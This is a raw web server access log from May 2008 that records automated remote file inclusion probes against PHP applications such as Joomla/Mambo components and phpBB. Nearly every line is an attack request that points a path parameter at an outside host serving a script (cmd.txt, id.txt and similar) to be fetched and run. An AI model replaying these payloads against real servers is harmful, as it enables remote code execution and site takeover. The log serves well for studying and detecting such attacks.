66.98.150.12 - - [14/May/2008:22:00:25 -0700] "GET /mcf.php?content=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
66.98.150.12 - - [14/May/2008:22:00:25 -0700] "GET /mcf.php?content=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
80.93.56.68 - - [14/May/2008:22:00:37 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://pskovclub.ru/rec/images/uid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.jainvestigation.com"
221.143.48.33 - - [14/May/2008:22:00:48 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.jainvestigation.com"
221.143.48.33 - - [14/May/2008:22:00:49 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.jainvestigation.com"
160.99.12.231 - - [14/May/2008:22:00:57 -0700] "GET /logs/homepage.php?sel=http://216.120.252.101/~beogor/news/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "jainvestigation.com"
160.99.12.231 - - [14/May/2008:22:01:02 -0700] "GET /homepage.php?sel=http://216.120.252.101/~beogor/news/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "jainvestigation.com"
160.99.12.231 - - [14/May/2008:22:01:50 -0700] "GET /homepage.php?sel=http://216.120.252.101/~beogor/news/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.jainvestigation.com"
160.99.12.231 - - [14/May/2008:22:01:50 -0700] "GET /logs/homepage.php?sel=http://216.120.252.101/~beogor/news/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.jainvestigation.com"
87.106.16.18 - - [14/May/2008:22:01:59 -0700] "GET /logs/access_080429.log/index2.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.jainvestigation.com"
87.106.16.18 - - [14/May/2008:22:02:00 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.jainvestigation.com"
222.255.3.68 - - [14/May/2008:22:02:07 -0700] "GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://linknetcrew.com/source/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "jainvestigation.com"
222.255.3.68 - - [14/May/2008:22:02:07 -0700] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://linknetcrew.com/source/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "jainvestigation.com"
222.255.3.68 - - [14/May/2008:22:02:22 -0700] "GET //sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://linknetcrew.com/source/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "jainvestigation.com"
222.255.3.68 - - [14/May/2008:22:02:22 -0700] "GET /logs/access.log%22%20class=%22searchlinktitle%22%20title=%22jainvestigation.com/logs/access.log%22%20onMouseOver=%22window.status='jainvestigation.com/logs//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://linknetcrew.com/source/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "jainvestigation.com"
222.255.3.68 - - [14/May/2008:22:02:22 -0700] "GET /logs//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://linknetcrew.com/source/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "jainvestigation.com"
202.47.247.136 - - [14/May/2008:22:03:41 -0700] "GET /logs/index2.php?x=http://www.elitelibri.com/pages/read?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
202.143.173.2 - - [14/May/2008:22:03:41 -0700] "GET /index2.php?x=http://www.elitelibri.com/pages/read?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
194.128.253.84 - - [14/May/2008:22:03:47 -0700] "GET /logs//index.php?option=com_letterman&mosConfig_absolute_path=http://www.carrentalguru.com/includes/mambo???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "jainvestigation.com"
194.128.253.84 - - [14/May/2008:22:03:47 -0700] "GET //index.php?option=com_letterman&mosConfig_absolute_path=http://www.carrentalguru.com/includes/mambo???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "jainvestigation.com"
219.94.128.57 - - [14/May/2008:22:04:30 -0700] "GET /index2.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
202.47.247.136 - - [14/May/2008:22:04:52 -0700] "GET /logs/index2.php?x=http://www.elitelibri.com/pages/read?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
202.47.247.136 - - [14/May/2008:22:04:53 -0700] "GET /index2.php?x=http://www.elitelibri.com/pages/read?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
222.255.3.68 - - [14/May/2008:22:05:06 -0700] "GET /logs/admin.remository.php?mosConfig_absolute_path=http://linknetcrew.com/source/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.jainvestigation.com"
222.255.3.68 - - [14/May/2008:22:05:06 -0700] "GET /admin.remository.php?mosConfig_absolute_path=http://linknetcrew.com/source/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.jainvestigation.com"
207.12.113.130 - - [14/May/2008:22:06:19 -0700] "GET //skin/zero_vote/error.php?dir=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.jainvestigation.com"
207.12.113.130 - - [14/May/2008:22:06:19 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.jainvestigation.com"
87.244.220.2 - - [14/May/2008:22:06:35 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
209.121.50.114 - - [14/May/2008:22:06:50 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
209.121.50.114 - - [14/May/2008:22:06:51 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
87.106.16.18 - - [14/May/2008:22:07:43 -0700] "GET /logs/access.log/index2.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.jainvestigation.com"
91.121.106.117 - - [14/May/2008:22:08:41 -0700] "GET /logs/access.log/?mosConfig_admin_path=http://www.needvisa.net/card/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jainvestigation.com"
91.121.106.117 - - [14/May/2008:22:08:41 -0700] "GET /?mosConfig_admin_path=http://www.needvisa.net/card/arab.txt? HTTP/1.1" 200 916 "-" "libwww-perl/5.810" "www.jainvestigation.com"
193.200.150.23 - - [14/May/2008:22:08:41 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://keirafans.net/img/test.txt????????????????????????? HTTP/1.0" 404 275 "-" "http://Anonymouse.org/ (Unix)" "www.jainvestigation.com"
193.200.150.23 - - [14/May/2008:22:08:41 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://keirafans.net/img/test.txt????????????????????????? HTTP/1.0" 404 275 "-" "http://Anonymouse.org/ (Unix)" "www.jainvestigation.com"
91.121.106.117 - - [14/May/2008:22:08:41 -0700] "GET /logs/?mosConfig_admin_path=http://www.needvisa.net/card/arab.txt? HTTP/1.1" 200 1939 "-" "libwww-perl/5.810" "www.jainvestigation.com"
67.195.37.173 - - [14/May/2008:22:08:53 -0700] "GET /logs/access.log HTTP/1.0" 200 8267 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.jainvestigation.com"
84.234.77.101 - - [14/May/2008:22:09:01 -0700] "GET /logs/access_080502.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.ibeq.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "jainvestigation.com"
84.234.77.101 - - [14/May/2008:22:09:01 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.ibeq.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "jainvestigation.com"
84.234.77.101 - - [14/May/2008:22:09:02 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.ibeq.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "jainvestigation.com"
58.26.137.64 - - [14/May/2008:22:09:31 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://216.120.252.101/~beogor/news/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.jainvestigation.com"
58.26.137.64 - - [14/May/2008:22:09:31 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://216.120.252.101/~beogor/news/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.jainvestigation.com"
74.55.113.226 - - [14/May/2008:22:09:32 -0700] "GET /logs/access.log/?mosConfig_admin_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
74.55.113.226 - - [14/May/2008:22:09:32 -0700] "GET /?mosConfig_admin_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 200 916 "-" "libwww-perl/5.805" "www.jainvestigation.com"
74.55.113.226 - - [14/May/2008:22:09:32 -0700] "GET /logs/?mosConfig_admin_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.805" "www.jainvestigation.com"
74.55.113.226 - - [14/May/2008:22:09:36 -0700] "GET /logs/access.log/?mosConfig_admin_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
74.55.113.226 - - [14/May/2008:22:09:37 -0700] "GET /?mosConfig_admin_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 200 916 "-" "libwww-perl/5.805" "www.jainvestigation.com"
74.55.113.226 - - [14/May/2008:22:09:37 -0700] "GET /logs/?mosConfig_admin_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.805" "www.jainvestigation.com"
74.55.113.226 - - [14/May/2008:22:09:38 -0700] "GET /logs/access.log/?mosConfig_admin_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
74.55.113.226 - - [14/May/2008:22:09:38 -0700] "GET /?mosConfig_admin_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 200 916 "-" "libwww-perl/5.805" "www.jainvestigation.com"
74.55.113.226 - - [14/May/2008:22:09:38 -0700] "GET /logs/?mosConfig_admin_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.805" "www.jainvestigation.com"
193.200.150.45 - - [14/May/2008:22:11:05 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://keirafans.net/img/test.txt????????????????????????? HTTP/1.0" 404 275 "-" "http://Anonymouse.org/ (Unix)" "jainvestigation.com"
193.200.150.26 - - [14/May/2008:22:11:07 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://keirafans.net/img/test.txt????????????????????????? HTTP/1.0" 404 275 "-" "http://Anonymouse.org/ (Unix)" "jainvestigation.com"
217.76.155.52 - - [14/May/2008:22:11:09 -0700] "GET /logs/access.log/?mosConfig_admin_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
217.76.155.52 - - [14/May/2008:22:11:10 -0700] "GET /?mosConfig_admin_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 200 916 "-" "libwww-perl/5.79" "www.jainvestigation.com"
217.76.155.52 - - [14/May/2008:22:11:10 -0700] "GET /logs/?mosConfig_admin_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.79" "www.jainvestigation.com"
222.255.3.68 - - [14/May/2008:22:11:39 -0700] "GET /logs/access.log%22%20class=%22searchlinktitle%22%20title=%22jainvestigation.com/logs/access.log%22%20onMouseOver=%22window.status='jainvestigation.com/logs//skin/zero_vote/error.php?dir=http://linknetcrew.com/source/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "jainvestigation.com"
222.255.3.68 - - [14/May/2008:22:11:39 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://linknetcrew.com/source/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "jainvestigation.com"
222.255.3.68 - - [14/May/2008:22:11:40 -0700] "GET //skin/zero_vote/error.php?dir=http://linknetcrew.com/source/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "jainvestigation.com"
193.178.228.12 - - [14/May/2008:22:13:19 -0700] "GET /logs/access_080418.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
193.178.228.12 - - [14/May/2008:22:13:22 -0700] "GET /logs/access_080418.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
87.106.68.149 - - [14/May/2008:22:13:44 -0700] "GET /logs/access_080430.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
87.106.68.149 - - [14/May/2008:22:13:44 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
87.106.68.149 - - [14/May/2008:22:13:45 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
87.106.68.149 - - [14/May/2008:22:13:49 -0700] "GET /logs/access_080501.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
211.43.222.200 - - [14/May/2008:22:15:08 -0700] "GET /logs/access.log/?mosConfig_admin_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.jainvestigation.com"
211.43.222.200 - - [14/May/2008:22:15:08 -0700] "GET /?mosConfig_admin_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 200 916 "-" "libwww-perl/5.63" "www.jainvestigation.com"
211.43.222.200 - - [14/May/2008:22:15:09 -0700] "GET /logs/?mosConfig_admin_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.63" "www.jainvestigation.com"
211.43.222.200 - - [14/May/2008:22:15:10 -0700] "GET /logs/access.log/?mosConfig_admin_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.jainvestigation.com"
211.43.222.200 - - [14/May/2008:22:15:11 -0700] "GET /?mosConfig_admin_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 200 916 "-" "libwww-perl/5.63" "www.jainvestigation.com"
211.43.222.200 - - [14/May/2008:22:15:11 -0700] "GET /logs/?mosConfig_admin_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.63" "www.jainvestigation.com"
87.106.76.232 - - [14/May/2008:22:15:50 -0700] "GET /logs/access.log/?mosConfig_admin_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.jainvestigation.com"
87.106.76.232 - - [14/May/2008:22:15:50 -0700] "GET /?mosConfig_admin_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 200 916 "-" "libwww-perl/5.803" "www.jainvestigation.com"
87.106.76.232 - - [14/May/2008:22:15:50 -0700] "GET /logs/?mosConfig_admin_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.803" "www.jainvestigation.com"
207.115.80.2 - - [14/May/2008:22:16:34 -0700] "GET /logs/components/com_extcalendar/extcalendar.php?&mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "jainvestigation.com"
207.115.80.2 - - [14/May/2008:22:16:34 -0700] "GET /components/com_extcalendar/extcalendar.php?&mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "jainvestigation.com"
84.234.77.101 - - [14/May/2008:22:16:41 -0700] "GET /logs/access_080430.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.ibeq.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
84.234.77.101 - - [14/May/2008:22:16:42 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.ibeq.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
84.234.77.101 - - [14/May/2008:22:16:42 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.ibeq.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
72.232.247.42 - - [14/May/2008:22:17:02 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "jainvestigation.com"
72.232.247.42 - - [14/May/2008:22:17:02 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "jainvestigation.com"
201.6.124.15 - - [14/May/2008:22:17:05 -0700] "GET /logs/access_080501.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.ulbracarazinho.edu.br/pos/cmds.txt??F? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "jainvestigation.com"
201.6.124.15 - - [14/May/2008:22:17:05 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.ulbracarazinho.edu.br/pos/cmds.txt??F? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "jainvestigation.com"
201.6.124.15 - - [14/May/2008:22:17:06 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.ulbracarazinho.edu.br/pos/cmds.txt??F? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "jainvestigation.com"
216.139.221.64 - - [14/May/2008:22:17:09 -0700] "GET /logs/access_080502.log//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
216.139.221.64 - - [14/May/2008:22:17:09 -0700] "GET //include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
216.139.221.64 - - [14/May/2008:22:17:09 -0700] "GET /logs//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
216.139.221.64 - - [14/May/2008:22:17:17 -0700] "GET //yabbse/Sources/Packages.php?sourcedir=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.jainvestigation.com"
216.139.221.64 - - [14/May/2008:22:17:17 -0700] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.jainvestigation.com"
216.139.221.64 - - [14/May/2008:22:17:20 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.jainvestigation.com"
216.139.221.64 - - [14/May/2008:22:17:20 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.jainvestigation.com"
121.78.116.71 - - [14/May/2008:22:17:20 -0700] "GET /logs/access.log/?mosConfig_admin_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.jainvestigation.com"
121.78.116.71 - - [14/May/2008:22:17:21 -0700] "GET /?mosConfig_admin_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 200 916 "-" "libwww-perl/5.63" "www.jainvestigation.com"
121.78.116.71 - - [14/May/2008:22:17:21 -0700] "GET /logs/?mosConfig_admin_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.63" "www.jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:17:25 -0700] "GET /logs/access_080502.log//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:17:26 -0700] "GET //include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:17:26 -0700] "GET /logs//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
216.139.221.64 - - [14/May/2008:22:17:45 -0700] "GET //yabbse/Sources/Packages.php?sourcedir=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "jainvestigation.com"
216.139.221.64 - - [14/May/2008:22:17:46 -0700] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:17:50 -0700] "GET /logs/access_080502.log//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:17:50 -0700] "GET //include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:17:50 -0700] "GET /logs//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:17:51 -0700] "GET /logs/access_080429.log/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:17:51 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:17:51 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jainvestigation.com"
216.139.221.64 - - [14/May/2008:22:17:52 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "jainvestigation.com"
216.139.221.64 - - [14/May/2008:22:17:52 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "jainvestigation.com"
216.139.221.64 - - [14/May/2008:22:17:56 -0700] "GET /logs/access_080429.log/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
216.139.221.64 - - [14/May/2008:22:17:56 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
216.139.221.64 - - [14/May/2008:22:17:56 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:18:00 -0700] "GET /logs/access_080429.log/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:18:00 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:18:00 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:18:13 -0700] "GET /logs/access_080502.log//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:18:14 -0700] "GET //include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:18:14 -0700] "GET /logs//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:18:23 -0700] "GET /order/login.php?svr_rootscript=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.jainvestigation.com"
